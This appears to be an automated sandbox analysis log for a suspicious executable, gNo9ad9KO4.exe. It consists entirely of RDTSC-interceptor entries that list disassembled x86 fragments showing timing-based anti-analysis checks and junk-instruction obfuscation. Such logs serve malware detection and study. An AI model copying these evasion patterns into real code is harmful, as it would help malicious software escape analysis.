                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3939D6 second address: 3939EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jg 00007F4688C929D6h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3939EC second address: 3939F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3939F2 second address: 393A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F4688C929E2h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 393B24 second address: 393B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F4688C1B775h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 393B45 second address: 393B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4688C929DFh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3982FD second address: 398301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 398301 second address: 398329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F4688C929DAh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 39B67C second address: 39B686 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 39B686 second address: 39B697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929DDh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 39B73D second address: 39B743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 39B816 second address: 1CEE86 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 233A3087h 0x00000012 pushad 0x00000013 mov edx, eax 0x00000015 jmp 00007F4688C929E9h 0x0000001a popad 0x0000001b push dword ptr [ebp+122D02D1h] 0x00000021 cmc 0x00000022 call dword ptr [ebp+122D34DBh] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D1AD8h], ecx 0x0000002f xor eax, eax 0x00000031 cld 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 jmp 00007F4688C929E9h 0x0000003b mov dword ptr [ebp+122D3B28h], eax 0x00000041 add dword ptr [ebp+122D1AD8h], ebx 0x00000047 mov esi, 0000003Ch 0x0000004c mov dword ptr [ebp+122D1AD8h], esi 0x00000052 mov dword ptr [ebp+122D1AD8h], esi 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c clc 0x0000005d lodsw 0x0000005f clc 0x00000060 add eax, dword ptr [esp+24h] 0x00000064 or dword ptr [ebp+122D1AD8h], ebx 0x0000006a mov ebx, dword ptr [esp+24h] 0x0000006e jmp 00007F4688C929DCh 0x00000073 nop 0x00000074 pushad 0x00000075 push edx 0x00000076 jmp 00007F4688C929DAh 0x0000007b pop edx 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F4688C929E8h 0x00000083 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A08F2 second address: 3A08F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A08F8 second address: 3A08FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A08FE second address: 3A0902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A01DA second address: 3A01E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A0630 second address: 3A063A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4688C1B766h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A063A second address: 3A063E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A505B second address: 3A5060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A5060 second address: 3A5066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A5066 second address: 3A506A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A506A second address: 3A508B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F4688C929E7h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A508B second address: 3A5095 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C1B76Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A5095 second address: 3A509D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A509D second address: 3A50A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3769FA second address: 35737C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F4688C929D8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov ecx, esi 0x00000023 lea eax, dword ptr [ebp+1247B77Fh] 0x00000029 mov dword ptr [ebp+122D2384h], ecx 0x0000002f mov dx, 068Ch 0x00000033 push eax 0x00000034 push esi 0x00000035 ja 00007F4688C929DCh 0x0000003b pop esi 0x0000003c mov dword ptr [esp], eax 0x0000003f and di, 3862h 0x00000044 xor dword ptr [ebp+1243E974h], ebx 0x0000004a call dword ptr [ebp+122D1A32h] 0x00000050 push eax 0x00000051 push edx 0x00000052 jno 00007F4688C929D8h 0x00000058 jmp 00007F4688C929E4h 0x0000005d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 376E75 second address: 1CEE86 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F4688C1B76Ah 0x00000011 push edi 0x00000012 jng 00007F4688C1B766h 0x00000018 pop edi 0x00000019 popad 0x0000001a nop 0x0000001b mov ecx, dword ptr [ebp+122D32E3h] 0x00000021 push dword ptr [ebp+122D02D1h] 0x00000027 mov dword ptr [ebp+122D324Dh], edx 0x0000002d call dword ptr [ebp+122D34DBh] 0x00000033 pushad 0x00000034 mov dword ptr [ebp+122D1AD8h], ecx 0x0000003a xor eax, eax 0x0000003c cld 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jmp 00007F4688C1B779h 0x00000046 mov dword ptr [ebp+122D3B28h], eax 0x0000004c add dword ptr [ebp+122D1AD8h], ebx 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D1AD8h], esi 0x0000005d mov dword ptr [ebp+122D1AD8h], esi 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 clc 0x00000068 lodsw 0x0000006a clc 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f or dword ptr [ebp+122D1AD8h], ebx 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 jmp 00007F4688C1B76Ch 0x0000007e nop 0x0000007f pushad 0x00000080 push edx 0x00000081 jmp 00007F4688C1B76Ah 0x00000086 pop edx 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007F4688C1B778h 0x0000008e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 376FAE second address: 376FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 376FB4 second address: 376FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 376FB8 second address: 1CEE86 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c mov cx, di 0x0000000f pop edx 0x00000010 xor dword ptr [ebp+122D33DCh], edi 0x00000016 push dword ptr [ebp+122D02D1h] 0x0000001c xor cx, 1B3Dh 0x00000021 call dword ptr [ebp+122D34DBh] 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D1AD8h], ecx 0x0000002e xor eax, eax 0x00000030 cld 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jmp 00007F4688C929E9h 0x0000003a mov dword ptr [ebp+122D3B28h], eax 0x00000040 add dword ptr [ebp+122D1AD8h], ebx 0x00000046 mov esi, 0000003Ch 0x0000004b mov dword ptr [ebp+122D1AD8h], esi 0x00000051 mov dword ptr [ebp+122D1AD8h], esi 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b clc 0x0000005c lodsw 0x0000005e clc 0x0000005f add eax, dword ptr [esp+24h] 0x00000063 or dword ptr [ebp+122D1AD8h], ebx 0x00000069 mov ebx, dword ptr [esp+24h] 0x0000006d jmp 00007F4688C929DCh 0x00000072 nop 0x00000073 pushad 0x00000074 push edx 0x00000075 jmp 00007F4688C929DAh 0x0000007a pop edx 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007F4688C929E8h 0x00000082 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 377314 second address: 37731A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 377D08 second address: 377D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 377D0C second address: 377D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 377DA8 second address: 377DF4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F4688C929E5h 0x00000010 lea eax, dword ptr [ebp+1247B77Fh] 0x00000016 pushad 0x00000017 mov dword ptr [ebp+124444CEh], esi 0x0000001d mov dword ptr [ebp+124453C9h], esi 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4688C929E5h 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A41E7 second address: 3A41EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A41EB second address: 3A41F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A41F1 second address: 3A41FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A4476 second address: 3A4480 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A4480 second address: 3A448E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F4688C1B76Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A448E second address: 3A44C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F4688C929E6h 0x0000000a ja 00007F4688C929D6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F4688C929DDh 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A44C6 second address: 3A44DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007F4688C1B76Eh 0x0000000e pop edi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A44DE second address: 3A44FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 jmp 00007F4688C929DFh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A48C9 second address: 3A48CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A48CF second address: 3A48D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A4A22 second address: 3A4A34 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F4688C1B76Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3A4BFF second address: 3A4C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929E8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3ADA31 second address: 3ADA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F4688C1B766h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 336065 second address: 336077 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F4688C929D6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 336077 second address: 336087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F4688C1B77Ah 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AC336 second address: 3AC33A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AC33A second address: 3AC350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4688C1B770h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AC350 second address: 3AC355 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AC355 second address: 3AC38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F4688C1B774h 0x0000000d jmp 00007F4688C1B779h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AC38C second address: 3AC3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4688C929D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jg 00007F4688C929D8h 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007F4688C929D6h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AC3AA second address: 3AC3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AC514 second address: 3AC519 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AC6C3 second address: 3AC6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3ACE49 second address: 3ACE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3ACE4D second address: 3ACE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AD171 second address: 3AD176 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AD8DB second address: 3AD900 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F4688C1B766h 0x00000009 jmp 00007F4688C1B778h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AD900 second address: 3AD906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3AC094 second address: 3AC099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B2E1D second address: 3B2E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4688C929D6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B2E27 second address: 3B2E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B2F62 second address: 3B2F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DBh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3399 second address: 3B339E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B339E second address: 3B33D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DDh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4688C929E4h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 jp 00007F4688C929D6h 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B33D8 second address: 3B33ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4688C1B76Ch 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B33ED second address: 3B342B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E3h 0x00000007 pushad 0x00000008 jno 00007F4688C929D6h 0x0000000e jmp 00007F4688C929E5h 0x00000013 jmp 00007F4688C929DBh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3587 second address: 3B35C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 jnc 00007F4688C1B76Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007F4688C1B768h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F4688C1B76Eh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B35C0 second address: 3B35C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B35C8 second address: 3B35D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B385B second address: 3B385F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B385F second address: 3B3863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3863 second address: 3B3897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4688C929E8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C929E4h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B39D2 second address: 3B39D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3B89 second address: 3B3B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3B8F second address: 3B3B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F4688C1B77Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3B9C second address: 3B3BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929E1h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3BB1 second address: 3B3BB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
